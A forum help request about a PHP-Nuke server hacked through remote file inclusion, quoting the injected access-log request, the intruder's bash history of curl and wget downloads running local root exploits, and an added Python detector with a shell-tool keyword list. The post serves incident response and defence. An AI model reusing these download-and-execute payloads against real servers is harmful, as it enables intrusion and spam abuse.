Server Hacked - PHP source injection vulnerability used to gain access - HELP!!
One of my friends' servers had the following files in the /tmp folder:
TTdummyfile
brk
kmx
krad
phpyLiy4H
ptrace
pwned
r0nin
uselib24
----
And there were 50,000 mails in queue.
-----
The intruder used the My_eGallery module in php-nuke to write files in /tmp. The entry in access_log looked like this:
xxx.x.xx.xxx - - [xx/Jun/2005:18:10:17 +1030] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.segfaultbr.hpgvip.com.br/tool25.gif?&cmd=cd%20/tmp;curl%20-o%20r0nin%20http://www.ciget.com.ve/.0/r0nin;chmod%20777%20;r0nin./r0nin HTTP/1.1" 200 10257 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
---------
The /var/tmp/.bash_history shows he executed the following commands:
ps x
cd /tmp
ls
curl -o brk http://www.ciget.com.ve/.0/brk
chmod 777 brk
./brk
uname -a
curl -o krad http://www.ciget.com.ve/.0/krad
chmod 777 krad
./krad
wget http://www.ciget.com.ve/.0/
curl -o ptrace http://www.ciget.com.ve/.0/ptrace
chmod 777 ptrace
./ptrace
./ptrace
./ptrace
./ptrace
./ptrace
curl -o kmx jihad.hpgvip.ig.com.br/kmx
chmod 777 kmx
./kmx
curl -o uselib24 http://www.ciget.com.ve/.0/uselib24
chmod 777 uselib24
./uselib24
curl -o pwned http://www.ciget.com.ve/.0/pwned
chmod 777 pwned
./pwned
./uselib24
./uselib24
./uselib24
ls
./ptrace
./kmx
./brk
cd /dev/shm
ls
curl -o uselib24 http://www.ciget.com.ve/.0/uselib24
chmod 777 uselib24
./uselib24
curl -o elflbl http://www.ciget.com.ve/.0/elflbl
chmod 777 elflbl
./elflbl
./elflbl
./elflbl
./elflbl
./elflbl
./elflbl
./uselib24
elflbl -f
./elflbl -f
curl -o brk2 http://www.ciget.com.ve/.0/brk2
chmod 777 brk2
./brk2
curl -o ptrace http://www.ciget.com.ve/.0/ptrace
chmod 777 ptrace
./ptrace
curl -o kmod http://www.ciget.com.ve/.0/kmod
chmod 777 kmod
./kmod
./kmod
curl -o mremap2 http://www.ciget.com.ve/.0/mremap2
chmod 777 mremap2
./mremap2
mremap2
./mremap2
curl -o rap http://www.ciget.com.ve/.0/raptor_chown
chmod 777 rap
./rap
./rap
./rap
./rap pwned
curl -o w00t http://www.ciget.com.ve/.0/w00t
chmod 777 w00t
./w00t
ls
./uselib24
ps x
cd /var/tmp
ls
mkdir .c
cd .c.
ls
cd .c
ls
uname -a
uptime
wget jove.prohosting.com/cndrcorp/c.txt
cd /dev/shm
ls
./ptrace
wget http://212.112.243.70/.cartao/cartao.html
ls
pwd
mkdir ,c
cd ,c
pwd
wget http://212.112.243.70/.cartao/cartao.html
cd /tmp
ls
wget http://212.112.243.70/.cartao/cartao.html
wget jove.prohosting.com/cndrcorp/c.txt
-------
My datacenter tech told me:
"Judging from the history at /var/tmp/.bash_history, it does not appear they managed to do anything other than send spam e-mails. They attempted to run some local exploits on the server, but did not successfully gain root access....these are all old exploits and patched in your particular kernel (Enterprise Linux)."
If I were to believe the tech, then how did the intruder manage to get 50,000 mails in the queue?
--------
I was told to disable "allow_url_fopen" in php.ini, and that this will disallow the PHP file injection.
Does this ensure server will be safe from these attacks in future?
------
Can I rest assured that the intruder was not able to cause any damage and compromise my server?
------
What needs to be done so that requests such as the following are disallowed?
/modules/My_eGallery/public/displayCategory.php?basepath=http://hacker.com/spy.gif?&cmd=cd%20/var/tmp;wget%20http://www.hacker2.org/bot.txt;perl%20bot.txt
---------
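As an added example (not the poster's code and not PHP-Nuke's), the following Python script demonstrates the two defensive checks that the access_log entry and the last question above point to: flagging requests in which a parameter value is a URL or carries a chained command, and validating a basepath-style parameter so that it can only resolve to a path under the module's own directory before anything is included. The log lines, the host attacker.example and the webroot path are constructed placeholders, not data from the post.

```python
"""Flag remote-file-inclusion (RFI) requests in Apache access_log lines and
validate a basepath-style parameter before it reaches include().

Added example, not the original poster's or PHP-Nuke's code. The log
lines below are constructed; only their shape mirrors the request in
the post. attacker.example and the webroot are placeholders."""
import posixpath
import re
from urllib.parse import unquote_plus

# Prefix of the Apache common/combined log format. Assumes the request
# target contains no literal spaces (Apache escapes them in the log).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# Any URL scheme (http:, ftp:, php:, data:, ...) or a protocol-relative //host
SCHEME_RE = re.compile(r'^(?:[a-z][a-z0-9+.\-]*:|//)', re.IGNORECASE)
# Tools that typically open a command chain smuggled through a query parameter
SHELL_TOOLS = {'cd', 'curl', 'wget', 'lynx', 'fetch', 'chmod', 'perl', 'sh', 'bash'}


def parse_query(query):
    """Split a raw query string on '&' only and percent-decode both sides.

    Done by hand rather than with parse_qsl so that ';' inside a value
    (a shell separator in the injected command) is never treated as a
    parameter separator."""
    params = {}
    for part in query.split('&'):
        if not part:
            continue
        key, _, value = part.partition('=')
        params[unquote_plus(key)] = unquote_plus(value)
    return params


def command_chain(value):
    """Return the ';'-separated segments of value if it looks like a shell
    command chain, otherwise an empty list."""
    segments = [s.strip() for s in value.split(';') if s.strip()]
    if len(segments) < 2:
        return []
    if any(seg.split()[0] in SHELL_TOOLS for seg in segments):
        return segments
    return []


def analyse_line(line):
    """Return a findings dict for a log line, or None if it does not parse.

    'remote' maps parameters whose value is a URL (the RFI vector);
    'commands' maps parameters that carry a command chain."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group('target').partition('?')
    params = parse_query(query)
    remote = {k: v for k, v in params.items() if SCHEME_RE.match(v)}
    commands = {}
    for k, v in params.items():
        chain = command_chain(v)
        if chain:
            commands[k] = chain
    return {
        'ip': m.group('ip'),
        'path': path,
        'remote': remote,
        'commands': commands,
        'suspicious': bool(remote or commands),
    }


def validate_basepath(value, webroot='/var/www/html/modules/My_eGallery'):
    """Server-side check an include()-style parameter should pass.

    Rejects any scheme or protocol-relative URL, NUL bytes and anything
    that resolves outside webroot; returns the resolved path or None."""
    if '\x00' in value or SCHEME_RE.match(value):
        return None
    root = posixpath.normpath(webroot)
    resolved = posixpath.normpath(posixpath.join(root, value))
    if resolved == root or resolved.startswith(root + '/'):
        return resolved
    return None


# Constructed sample lines (not from the post's server).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jun/2005:18:10:17 +1030] "GET /modules/My_eGallery/public/displayCategory.php'
    '?basepath=http://attacker.example/tool.gif?&cmd=cd%20/tmp;curl%20-o%20r0nin%20http://attacker.example/r0nin;'
    'chmod%20777%20r0nin;./r0nin HTTP/1.1" 200 10257 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [01/Jun/2005:18:12:03 +1030] "GET /modules/My_eGallery/public/displayCategory.php'
    '?basepath=images/ HTTP/1.1" 200 4096 "-" "Mozilla/4.0"',
]


def scan(lines):
    """Return the findings for every suspicious line."""
    return [f for f in map(analyse_line, lines) if f and f['suspicious']]


if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(finding['ip'], finding['path'], finding['remote'], finding['commands'])
```

Running the script over a real access_log (one line per call to `analyse_line`) lists the requests whose `basepath` was a URL and, where present, the decoded command chain that was appended after the second `?`. The `validate_basepath` check is what the application itself should do regardless of the php.ini setting: it refuses any value that names a scheme or resolves outside the module directory, so a remote `basepath` never reaches `include()`.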